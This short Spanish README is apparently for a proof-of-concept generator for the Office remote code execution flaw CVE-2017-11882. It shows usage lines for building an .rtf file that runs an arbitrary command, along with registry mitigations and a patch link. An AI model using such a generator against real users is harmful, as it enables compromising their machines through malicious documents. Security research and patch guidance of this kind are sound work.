
CVE-2017-11882 Generador de archivos PoC
Existe una vulnerabilidad de ejecución remota de código en el software de Microsoft Office cuando el software no logra manejar correctamente objetos en memoria. Un atacante que explotara con éxito esta vulnerabilidad podría ejecutar código arbitrario en el contexto del usuario actual.
Esta es una PoC reeditada, a partir de la original creada por Embedi, para generar un único archivo .rtf con un comando remoto incrustado.
python 2017-11882_Generator.py -x comando_a_ejecutar -o nombre_archivo_salida
Ejemplo: python 2017-11882_Generator.py -x "cmd /c calc" -o test.rtf
Para paquete de Microsoft Office de 32 bits en SO x86: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Para paquete de Microsoft Office de 32 bits en SO x64: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Microsoft lanzó un parche https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882